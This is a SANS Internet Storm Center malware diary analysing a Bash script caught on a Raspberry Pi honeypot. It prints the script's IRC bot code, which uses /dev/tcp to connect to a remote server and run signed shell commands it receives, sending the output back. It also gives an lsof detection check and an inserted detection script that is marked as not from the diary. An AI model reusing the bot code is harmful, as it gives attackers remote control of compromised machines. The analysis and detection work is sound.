SANS ISC: Internet Storm Center
Malicious Network Traffic From /bin/bash

Published: 2018-04-25
Last Updated: 2018-04-25 06:50:25 UTC
by Xavier Mertens (Version: 1)

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry Pi. It's a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (a classic action these days)
  • Changes the password of the user 'pi' and adds an SSH key
  • Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new: it was already spotted in July 2017, but it looks slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is its ability to run a simple IRC bot using only Bash commands; no high-level language is needed. For years, Bash has had a very interesting feature that not many people are aware of: you can generate network flows using standard redirections. By default, a UNIX process always has the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flows. The syntax is /dev/<proto>/<host>/<port>.

That's the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if  [[ "$msg_in" =~ "PING" ]] ; then
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done

The magic line is the first one: it creates a new file descriptor ('3') that is used to read from and write to the TCP session established with the IRC server on port 6667. Once authenticated, the attacker is able to submit commands to the bot via private messages, and the result of each command is sent back.

Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use this specific feature, you can always recompile Bash with the configure option '--enable-net-redirections'. This can be helpful in many cases, for example to grab data from a remote server without external tools:

# Open a TCP connection to the web server on file descriptor 5 (read/write)
exec 5<> /dev/tcp/blog.rootshell.be/80
# The request must end with an empty line, otherwise the server waits for more headers
printf "GET / HTTP/1.0\r\nHost: blog.rootshell.be\r\n\r\n" >&5
# Read the response until the server closes the connection
cat <&5
# Close the file descriptor
exec 5>&-

A simple way to detect this behaviour is to search for network flows generated by /bin/bash processes. Example using lsof[3]:

# lsof -i | grep bash
bash      81084 xavier    5u  IPv4 0x1cbc30b70d8a7879      0t0  TCP xxxxx.rootshell.be:57253->blog.rootshell.be:http (ESTABLISHED)
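A small detection helper that turns the lsof check above into something you can run from a cron job or against a saved capture. It is an added example, not code from the diary or from the analysed sample: it flags every shell process holding a TCP or UDP socket (the footprint left by /dev/tcp and /dev/udp redirections) and, with --live, runs against the current system. The sample lsof lines are constructed and the list of shell names it matches is an assumption.

```shell
#!/usr/bin/env bash
# Added example (not from the diary): flag shell processes that hold
# TCP/UDP sockets, the footprint left by /dev/tcp and /dev/udp redirections.
# Input is text in `lsof -i -n -P` format, so it can come from a live run
# or from a saved capture. The sample below is constructed for the demo.

SAMPLE_LSOF='COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      1234  root    3u  IPv4  12345      0t0  TCP 10.0.0.5:22->10.0.0.9:51234 (ESTABLISHED)
bash      81084 xavier  5u  IPv4  67890      0t0  TCP 10.0.0.5:57253->192.0.2.10:80 (ESTABLISHED)
bash      4242  pi      3u  IPv4  67891      0t0  TCP 10.0.0.5:40001->198.51.100.7:6667 (ESTABLISHED)
curl      999   pi      4u  IPv4  67892      0t0  TCP 10.0.0.5:40002->192.0.2.20:443 (ESTABLISHED)
sh        777   pi      3u  IPv4  67893      0t0  UDP *:68'

# Emit "pid user fd remote" for every socket owned by a shell binary
# (the matched shell names are an assumption; extend as needed).
# Columns of `lsof -i -n -P`: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
flag_shell_sockets() {
  awk '$1 ~ /^(bash|sh|dash|zsh|ksh)$/ && $8 ~ /^(TCP|UDP)$/ {
         n = split($9, ep, "->")          # NAME is local->remote for TCP
         print $2, $3, $4, (n == 2 ? ep[2] : $9)
       }'
}

# Count hits in a capture passed as the first argument; alert when > 0.
count_shell_sockets() {
  printf '%s\n' "$1" | flag_shell_sockets | awk 'END { print NR }'
}

# Live check against the running system (needs lsof, usually as root).
live_check() {
  lsof -i -n -P 2>/dev/null | flag_shell_sockets
}

if [ "${1:-}" = "--live" ]; then
  live_check
else
  printf '%s\n' "$SAMPLE_LSOF" | flag_shell_sockets
fi
```

Each printed line is one shell with an open socket; on a box that only runs interactive shells, any hit deserves a look at /proc/<pid>/cmdline and the parent process.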

[1] https://isc.sans.edu/honeypot.html
[2] https://www.virustotal.com/#/file/ce53ae1c4f43f9f63b61fa1abd675cb8c0893aa3ffb50506fc401c5978318f74/detection
[3] https://www.forensicswiki.org/wiki/Lsof

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant